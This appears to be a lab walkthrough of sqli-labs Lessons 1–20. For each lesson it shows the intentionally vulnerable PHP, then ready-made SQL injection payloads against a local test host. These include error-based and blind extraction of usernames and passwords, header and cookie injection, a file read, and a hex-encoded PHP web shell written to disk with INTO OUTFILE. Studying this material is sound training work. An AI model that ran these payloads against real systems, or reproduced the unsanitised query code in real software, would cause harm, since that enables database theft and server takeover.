Less - 01 GET - Error Based - Single Quotes String(报错显示 基于单引号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['id']))
  4. {
  5. $id=$_GET['id'];
  6. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  7. $result=mysql_query($sql);
  8. $row = mysql_fetch_array($result);
  9. if($row){
  10. echo 'Your Login name:'. $row['username'];
  11. echo 'Your Password:' .$row['password'];
  12. }else{
  13. print_r(mysql_error());
  14. }
  15. }
  1. http://sqli.test/Less-1/?id=1
  2. http://sqli.test/Less-1/?id=1'and 1=1 -- # // 有数据
  3. http://sqli.test/Less-1/?id=1'and 1=2 -- # // 无数据
  4. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) -- # // XPATH syntax error: '^$root@localhost^$'
  5. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select database()),0x5e24),1)) -- # // XPATH syntax error: '^$security^$'
  6. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$emails^$'
  7. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x5e24),1)) -- # // XPATH syntax error: '^$referers^$'
  8. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x5e24),1)) -- # // XPATH syntax error: '^$uagents^$'
  9. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x5e24),1)) -- # // XPATH syntax error: '^$users^$'
  10. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$id^$'
  11. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),0x5e24),1)) -- # // XPATH syntax error: '^$username^$'
  12. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1),0x5e24),1)) -- # // XPATH syntax error: '^$password^$'
  13. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- # //XPATH syntax error: '^$id:1 username:Dumb password:Du'
  14. http://sqli.test/Less-1/?id=1'and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$umb^$'
  15. id:1 username:Dumb password:Dumb

Less - 02 GET - Error Based - Intiget Based (报错显示 数字型)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['id']))
  4. {
  5. $id=$_GET['id'];
  6. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  7. $result=mysql_query($sql);
  8. $row = mysql_fetch_array($result);
  9. if($row){
  10. echo 'Your Login name:'. $row['username'];
  11. echo 'Your Password:' .$row['password'];
  12. }else{
  13. print_r(mysql_error());
  14. }
  15. }
  1. http://sqli.test/Less-2/?id=1 and 1=1 // 有数据
  2. http://sqli.test/Less-2/?id=1 and 1=2 // 无数据
  3. http://sqli.test/Less-2/?id=1 and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$id:1 username:Dumb password:Du'
  4. http://sqli.test/Less-2/?id=1 and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$umb^$'
  5. id:1 username:Dumb password:Dumb

Less - 03 GET - Error Based - Single Quotes With Twist String (报错显示 带括号的单引号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['id']))
  4. {
  5. $id=$_GET['id'];
  6. $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
  7. $result=mysql_query($sql);
  8. $row = mysql_fetch_array($result);
  9. if($row){
  10. echo 'Your Login name:'. $row['username'];
  11. echo 'Your Password:' .$row['password'];
  12. }else{
  13. print_r(mysql_error());
  14. }
  15. }
  1. http://sqli.test/Less-3/?id=1' )and 1=1 -- w // 有数据
  2. http://sqli.test/Less-3/?id=1' )and 1=2 -- w // 无数据
  3. http://sqli.test/Less-3/?id=1' ) and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$id:1 username:Dumb password:Du'
  4. http://sqli.test/Less-3/?id=1' ) and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- # // XPATH syntax error: '^$umb^$'
  5. id:1 username:Dumb password:Dumb

Less - 04 GET - Error Based - Double Quotes - String(报错显示 双引号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['id']))
  4. {
  5. $id=$_GET['id'];
  6. $id = '"' . $id . '"';
  7. $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
  8. $result=mysql_query($sql);
  9. $row = mysql_fetch_array($result);
  10. if($row){
  11. echo 'Your Login name:'. $row['username'];
  12. echo 'Your Password:' .$row['password'];
  13. }else{
  14. print_r(mysql_error());
  15. }
  16. }
  1. http://sqli.test/Less-4/?id=1") and 1=1 -- + // 有数据
  2. http://sqli.test/Less-4/?id=1") and 1=2 -- + // 无数据
  3. http://sqli.test/Less-4/?id=1") and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),1,30) from users limit 0,1),0x5e24),1)) -- + // XPATH syntax error: '^$id:1 username:Dumb password:Du'
  4. http://sqli.test/Less-4/?id=1") and (updatexml(1,concat(0x5e24,(select substr(concat('id:',id,' username:',username,' password:',password),30,60) from users limit 0,1),0x5e24),1)) -- + // XPATH syntax error: '^$umb^$'
  5. id:1 username:Dumb password:Dumb

Less - 05 GET - Double Injection - Single Quotes - String(双注入 单引号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['id']))
  4. {
  5. $id=$_GET['id'];
  6. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  7. $result=mysql_query($sql);
  8. $row = mysql_fetch_array($result);
  9. if($row){
  10. echo 'You are in...........';
  11. }else{
  12. print_r(mysql_error());
  13. }
  14. }
  1. http://sqli.test/Less-5/?id=1' and 1=1 --+ // 有数据
  2. http://sqli.test/Less-5/?id=1' and 1=2 --+ // 无数据
  3. // 输出占位
  4. http://sqli.test/Less-5/?id=1 ' order by 1,2,3 --+ // 有数据
  5. http://sqli.test/Less-5/?id=1 ' order by 1,2,3,4 --+ // 报错
  6. // 报错注入
  7. http://sqli.test/Less-5/?id=1 ' union select 1,2,(updatexml(1,concat(0x7e,(select user()),0x7e),1)) --+ // security
  8. http://sqli.test/Less-5/?id=1' union select 1,2,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema= database() limit 0,1),0x7e),1)) --+ // emails
  9. http://sqli.test/Less-5/?id=1' union select 1,2,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema= database() and table_name='users' limit 0,1),0x7e),1)) --+ // id
  10. http://sqli.test/Less-5/?id=1' union select 1,2,(updatexml(1,concat(0x7e,(select concat(id,username,password) from security.users limit 0,1),0x7e),1)) --+ // 1DumbDumb
  11. // 报错读文件
  12. http://sqli.test/Less-5/?id=1 ' union select 1,2,(updatexml(1,concat(0x7e,(load_file('C:/phpstudy_pro/WWW/sqli/shell.php')),0x7e),1)) --+

Less - 06 GET - Double Injection - Double Quotes - String (双注入 双引号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['id']))
  4. {
  5. $id=$_GET['id'];
  6. $sql="SELECT * FROM users WHERE id="$id" LIMIT 0,1";
  7. $result=mysql_query($sql);
  8. $row = mysql_fetch_array($result);
  9. if($row){
  10. echo 'You are in...........';
  11. }else{
  12. print_r(mysql_error());
  13. }
  14. }
  1. // 测试
  2. http://sqli.test/Less-6/?id=1 " and 1=1 --+
  3. http://sqli.test/Less-6/?id=1 " and 1=2 --+
  4. // 与上一个一样的报错注入过程
  5. http://sqli.test/Less-5/?id=1" union select 1,2,(updatexml(1,concat(0x7e,(select concat(id,username,password) from security.users limit 0,1),0x7e),1)) --+ // 1DumbDumb

Less - 07 GET - Dump Into Outfile -String (文件导出)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['id']))
  4. {
  5. $id=$_GET['id'];
  6. $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
  7. $result=mysql_query($sql);
  8. $row = mysql_fetch_array($result);
  9. if($row){
  10. echo 'You are in.... Use outfile......';
  11. }else{
  12. echo 'You have an error in your SQL syntax';
  13. //print_r(mysql_error());
  14. }
  15. }
  1. // 测试
  2. http://sqli.test/Less-7/?id=1 ')) and 1=1 --+
  3. http://sqli.test/Less-7/?id=1 ')) and 1=2 --+
  4. // 写shell
  5. http://sqli.test/Less-7/?id=1 ')) union select 1,2,0x273c3f70687020406576616c28245f504f53545b3132335d293b3f3e27 into outfile 'C:/phpstudy_pro/WWW/sqli/Less-7/shell.php' --+

Less - 08 GET - Blind - Boolian Based - Single Quotes (布尔盲注 单引号)

  1. <?php
  2. error_reporting(0);
  3. // take the variables
  4. if(isset($_GET['id']))
  5. {
  6. $id=$_GET['id'];
  7. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  8. $result=mysql_query($sql);
  9. $row = mysql_fetch_array($result);
  10. if($row){
  11. echo 'You are in...........';
  12. }
  13. else{
  14. //echo 'You are in...........';
  15. //print_r(mysql_error());
  16. //echo "You have an error in your SQL syntax";
  17. }
  18. }
  1. // 测试
  2. http://sqli.test/Less-8/?id=1' and 1=1 --+
  3. http://sqli.test/Less-8/?id=1' and 1=2 --+
  4. // 盲注
  5. http://sqli.test/Less-8/?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+

Less - 09 GET - Blind - Time Based - Single Quotes(时间盲注 单引号)

  1. <?php
  2. error_reporting(0);
  3. // take the variables
  4. if(isset($_GET['id']))
  5. {
  6. $id=$_GET['id'];
  7. $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
  8. $result=mysql_query($sql);
  9. $row = mysql_fetch_array($result);
  10. if($row){
  11. echo 'You are in...........';
  12. }else{
  13. echo 'You are in...........';
  14. //print_r(mysql_error());
  15. //echo "You have an error in your SQL syntax";
  16. }
  17. }
  1. // 测试
  2. http://sqli.test/Less-9/?id=1 ' and sleep(4) --+
  3. // 延时盲注
  4. http://sqli.test/Less-9/?id=1 ' and if(ascii(substr(database(),1,1))=115,sleep(4),1) --+

Less - 10 GET - Time Based - Double Quotes (时间盲注 双引号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_GET['id']))
  4. {
  5. $id=$_GET['id'];
  6. $id = '"'.$id.'"';
  7. $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
  8. $result=mysql_query($sql);
  9. $row = mysql_fetch_array($result);
  10. if($row)
  11. {
  12. echo 'You are in...........';
  13. }
  14. else
  15. {
  16. echo 'You are in...........';
  17. //print_r(mysql_error());
  18. //echo "You have an error in your SQL syntax";
  19. }
  20. }
  1. // 测试
  2. http://sqli.test/Less-10/?id=1" and sleep(3) --+
  3. // 时间盲注
  4. http://sqli.test/Less-10/?id=1" and if(ascii(substr(database(),1,1))=115,sleep(4),1) --+

Less - 11 POST - Error Based - Single Quotes - String (基于报错 单引号 字符型)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_POST['uname']) && isset($_POST['passwd']))
  4. {
  5. $uname=$_POST['uname'];
  6. $passwd=$_POST['passwd'];
  7. @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
  8. $result=mysql_query($sql);
  9. $row = mysql_fetch_array($result);
  10. if($row){
  11. echo 'Your Login name:'. $row['username'];
  12. echo 'Your Password:' .$row['password'];
  13. }else{
  14. //echo "Try again looser";
  15. print_r(mysql_error());
  16. }
  17. }
  1. // 测试
  2. [POST] uname=admin&passwd=admin'and+1=2%20--+&submit=Submit
  3. // 报错注入
  4. [POST] uname=admin&passwd=admin'and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)--+&submit=Submit

Less - 12 POST - Error Based - Double Quotes - String - with twist (基于报错 双引号 字符型 带括号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_POST['uname']) && isset($_POST['passwd']))
  4. {
  5. $uname=$_POST['uname'];
  6. $passwd=$_POST['passwd'];
  7. $uname='"'.$uname.'"';
  8. $passwd='"'.$passwd.'"';
  9. @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  10. $result=mysql_query($sql);
  11. $row = mysql_fetch_array($result);
  12. if($row){
  13. echo 'Your Login name:'. $row['username'];
  14. echo 'Your Password:' .$row['password'];
  15. }else{
  16. print_r(mysql_error());
  17. }
  18. }
  1. // 测试
  2. [POST] uname=admin&passwd=admin")and+1=2+--+&submit=Submit
  3. // 报错注入
  4. [POST] uname=admin&passwd=admin")and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)+--+&submit=Submit

Less - 13 POST - Double Injection - Single Quotes - String - with twist(双注入 单引号 字符型 带括号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_POST['uname']) && isset($_POST['passwd']))
  4. {
  5. $uname=$_POST['uname'];
  6. $passwd=$_POST['passwd'];
  7. @$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
  8. $result=mysql_query($sql);
  9. $row = mysql_fetch_array($result);
  10. if($row){
  11. //echo 'Your Login name:'. $row['username'];
  12. //echo "<br>";
  13. //echo 'Your Password:' .$row['password'];
  14. //echo "<br>";
  15. }else{
  16. print_r(mysql_error());
  17. }
  18. }
  19. ?>
  1. // 测试
  2. [POST] uname=admin&passwd=admin')and+sleep(3)%20--+&submit=Submit
  3. // 时间盲注
  4. [POST] uname=admin&passwd=admin')and+if(ascii(substr(database(),1,1))=115,sleep(4),1)%20--+&submit=Submit
  5. // 报错注入
  6. [POST] uname=admin&passwd=admin')and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=Submit

Less - 14 POST - Double Injection - Double Quotes - String - with twist (双注入 双引号 字符型 带括号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_POST['uname']) && isset($_POST['passwd']))
  4. {
  5. $uname=$_POST['uname'];
  6. $passwd=$_POST['passwd'];
  7. $uname='"'.$uname.'"';
  8. $passwd='"'.$passwd.'"';
  9. @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
  10. $result=mysql_query($sql);
  11. $row = mysql_fetch_array($result);
  12. if($row){
  13. //echo 'Your Login name:'. $row['username'];
  14. //echo 'Your Password:' .$row['password'];
  15. }else{
  16. print_r(mysql_error());
  17. }
  18. }
  19. ?>
  1. // 测试
  2. [POST] uname=admin&passwd=admin"+and+sleep(3)%20--+&submit=Submit
  3. // 时间盲注
  4. [POST] uname=admin&passwd=admin"+and+if(ascii(substr(database(),1,1))=115,sleep(4),1)%20--+&submit=Submit
  5. // 报错注入
  6. [POST] uname=admin&passwd=admin"+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=

Less - 15 POST - Blind - Boolian/time Based - Single Quotes (布尔/时间盲注 单引号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_POST['uname']) && isset($_POST['passwd']))
  4. {
  5. $uname=$_POST['uname'];
  6. $passwd=$_POST['passwd'];
  7. @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
  8. $result=mysql_query($sql);
  9. $row = mysql_fetch_array($result);
  10. if($row){
  11. //echo 'Your Login name:'. $row['username'];
  12. //echo 'Your Password:' .$row['password'];
  13. }else{
  14. //print_r(mysql_error());
  15. }
  16. }
  17. ?>
  1. // 测试
  2. [POST] uname=admin&passwd=admin'+and+sleep(3)%20--+&submit=Submit
  3. //时间盲注
  4. [POST] uname=admin&passwd=admin'+and+if(ascii(substr(database(),1,1))=115,sleep(3),1)%20--+&submit=Submit

Less - 16 POST - Blind - Boolian/Time Based - Double Quotes ( 布尔/时间盲注 双引号)

  1. <?php
  2. error_reporting(0);
  3. if(isset($_POST['uname']) && isset($_POST['passwd']))
  4. {
  5. $uname=$_POST['uname'];
  6. $passwd=$_POST['passwd'];
  7. $uname='"'.$uname.'"';
  8. $passwd='"'.$passwd.'"';
  9. @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  10. $result=mysql_query($sql);
  11. $row = mysql_fetch_array($result);
  12. if($row){
  13. //echo 'Your Login name:'. $row['username'];
  14. //echo 'Your Password:' .$row['password'];
  15. }else{
  16. //echo "Try again looser";
  17. //print_r(mysql_error());
  18. }
  19. }
  20. ?>
  1. // 测试
  2. [POST] uname=admin&passwd=admin+")+and+sleep(3)--+&submit=Submit
  3. // 时间盲注
  4. [POST] uname=admin&passwd=admin+")+and+if(ascii(substr(database(),1,1))=115,sleep(3),1)--+&submit=Submit

Less - 17 POST - Update Query - Error Based - String (Update注入 基于报错)

  1. <?php
  2. error_reporting(0);
  3. function check_input($value){
  4. if(!empty($value)){ // empty:查变量是否为空
  5. $value = substr($value,0,15); // substr:取指定长度
  6. }
  7. if (get_magic_quotes_gpc()){ // 检查gpc是否开启
  8. $value = stripslashes($value); // stripslashes:除斜杠
  9. }if (!ctype_digit($value)){ // 检查是否为纯数组
  10. $value = "'" . mysql_real_escape_string($value) . "'"; // mysql_real_escape_string:字符转义
  11. }else{
  12. $value = intval($value); // intval:获取变量的整数值
  13. }
  14. return $value;
  15. }
  16. if(isset($_POST['uname']) && isset($_POST['passwd'])){
  17. $uname=check_input($_POST['uname']);
  18. $passwd=$_POST['passwd'];
  19. @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
  20. $result=mysql_query($sql);
  21. $row = mysql_fetch_array($result);
  22. if($row){
  23. $row1 = $row['username'];
  24. $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
  25. mysql_query($update);
  26. if (mysql_error()){
  27. print_r(mysql_error());
  28. }else{
  29. //echo " You password has been successfully updated " ;
  30. }
  31. //echo 'Your Password:' .$row['password'];
  32. }
  33. }
  34. ?>
  1. // 对以上代码进行简单审计后发现只有uname参数进行了过滤,passwd并没有进行过滤,那么就从passwd入手注就行了
  2. // 测试
  3. [POST] uname=dumb&passwd=123'"+and+1=2%20--+&submit=Submit // 报错
  4. // 报错注入
  5. [POST] uname=dumb&passwd=123'+and+updatexml(1,concat(0x7e,(select+database()),0x7e),1)%20--+&submit=Submit
  6. [POST] uname=dumb&passwd=1'+and+(select+1+from+(select+count(*),concat((select(select+concat(CAST(concat(username,password)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+&submit=Submit
  1. update users set password = '1' and (select 1 from (select count(*),concat((select(select concat(CAST(concat(username,password) as char),0x7e)) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  2. update users set password = '1' and (
  3. select 1 from (
  4. select count(*),concat(
  5. (select(select concat(CAST(concat(username,password) as char),0x7e)) from users limit 0,1)
  6. ,
  7. floor(rand(0)*2)
  8. )x
  9. from information_schema.tables group by x
  10. )a
  11. )

Less - 18 POST - Header Injection - Uagent Field - Error Based (Header头注入 Uagent字段 基于报错)

  1. <?php
  2. error_reporting(0);
  3. function check_input($value){
  4. if(!empty($value)){
  5. $value = substr($value,0,20);
  6. }if (get_magic_quotes_gpc()){
  7. $value = stripslashes($value);
  8. }if (!ctype_digit($value)){
  9. $value = "'" . mysql_real_escape_string($value) . "'";
  10. }else{
  11. $value = intval($value);
  12. }
  13. return $value;
  14. }
  15. $uagent = $_SERVER['HTTP_USER_AGENT']; // $_SERVER:获取服务器执行环境 HTTP_USER_AGENT:用户浏览器请求头
  17. echo 'Your IP ADDRESS is: ' .$IP;
  18. if(isset($_POST['uname']) && isset($_POST['passwd'])){
  19. $uname = check_input($_POST['uname']);
  20. $passwd = check_input($_POST['passwd']);
  21. $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
  22. $result1 = mysql_query($sql);
  23. $row1 = mysql_fetch_array($result1);
  24. if($row1){
  25. $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
  26. mysql_query($insert);
  27. echo 'Your User Agent is: ' .$uagent;
  28. print_r(mysql_error());
  29. }else{
  30. print_r(mysql_error());
  31. }
  32. }
  33. ?>
  1. // 对上面代码进行简单审计发现一个用于记录用户登陆信息的功能,且该字段用户可控并且未进行字段过滤($uagent,$IP)
  2. // 测试
  3. [User-Agent] 'and 1=2 // 报错
  4. // 报错注入
  5. [User-Agent] 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

Less - 19 POST - Header Injection - Referer Field - Error Based (Header头注入 Referer字段 基于报错)

  1. <?php
  2. error_reporting(0);
  3. function check_input($value){
  4. if(!empty($value)){
  5. $value = substr($value,0,20);
  6. }if (get_magic_quotes_gpc()){
  7. $value = stripslashes($value);
  8. }if (!ctype_digit($value)){
  9. $value = "'" . mysql_real_escape_string($value) . "'";
  10. }else{
  11. $value = intval($value);
  12. }
  13. return $value;
  14. }
  15. $uagent = $_SERVER['HTTP_REFERER']; // HTTP_REFERER:获取前一页面的 URL 地址
  16. $IP = $_SERVER['REMOTE_ADDR'];
  17. if(isset($_POST['uname']) && isset($_POST['passwd'])){
  18. $uname = check_input($_POST['uname']);
  19. $passwd = check_input($_POST['passwd']);
  20. $sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
  21. $result1 = mysql_query($sql);
  22. $row1 = mysql_fetch_array($result1);
  23. if($row1){
  24. $insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
  25. echo 'Your Referer is: ' .$uagent;
  26. mysql_query($insert);
  27. print_r(mysql_error());
  28. }else{
  29. print_r(mysql_error());
  30. }
  31. }
  32. ?>
  1. // 测试
  2. [referer] 'and 1=2 // 报错
  3. // 报错注入
  4. [referer] 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1

Less - 20 POST - Cookie Injections - Uagent Field - Error Based (Cookie注入 Uagent字段 基于报错)

  1. <?php
  2. error_reporting(0);
  3. if (!isset($_COOKIE['uname'])) {
  4. function check_input($value)
  5. {
  6. if (!empty($value)) {
  7. $value = substr($value, 0, 20); // truncation (see comments)
  8. }
  9. if (get_magic_quotes_gpc()) // Stripslashes if magic quotes enabled
  10. {
  11. $value = stripslashes($value);
  12. }
  13. if (!ctype_digit($value)) // Quote if not a number
  14. {
  15. $value = "'" . mysql_real_escape_string($value) . "'";
  16. } else {
  17. $value = intval($value);
  18. }
  19. return $value;
  20. }
  21. if (isset($_POST['uname']) && isset($_POST['passwd'])) {
  22. $uname = check_input($_POST['uname']);
  23. $passwd = check_input($_POST['passwd']);
  24. $sql = "SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
  25. $result1 = mysql_query($sql);
  26. $row1 = mysql_fetch_array($result1);
  27. $cookee = $row1['username'];
  28. if ($row1) {
  29. setcookie('uname', $cookee, time() + 3600);
  30. header('Location: index.php');
  31. echo "I LOVE YOU COOKIES";
  32. print_r(mysql_error());
  33. } else {
  34. print_r(mysql_error());
  35. }
  36. }
  37. } else {
  38. if (!isset($_POST['submit'])) {
  39. $cookee = $_COOKIE['uname'];
  40. $format = 'D d M Y - H:i:s';
  41. $timestamp = time() + 3600;
  45. echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
  46. $sql = "SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
  47. $result = mysql_query($sql);
  48. if (!$result) {
  49. die('Issue with your mysql: ' . mysql_error());
  50. }
  51. $row = mysql_fetch_array($result);
  52. if ($row) {
  53. echo 'Your Login name:' . $row['username'];
  54. echo 'Your Password:' . $row['password'];
  55. echo 'Your ID:' . $row['id'];
  56. } else {
  57. }
  58. echo '<input type="submit" name="submit" value="Delete Your Cookie!" />';
  59. } else {
  60. echo " Your Cookie is deleted";
  61. setcookie('uname', $row1['username'], time() - 3600);
  62. header('Location: index.php');
  63. }
  64. }
  1. // 测试
  2. [cookie] uname=Dumb 'and 1=1 --+
  3. [cookie] uname=Dumb 'and 1=2 --+
  4. // 报错注入
  5. [cookie] uname=Dumb 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+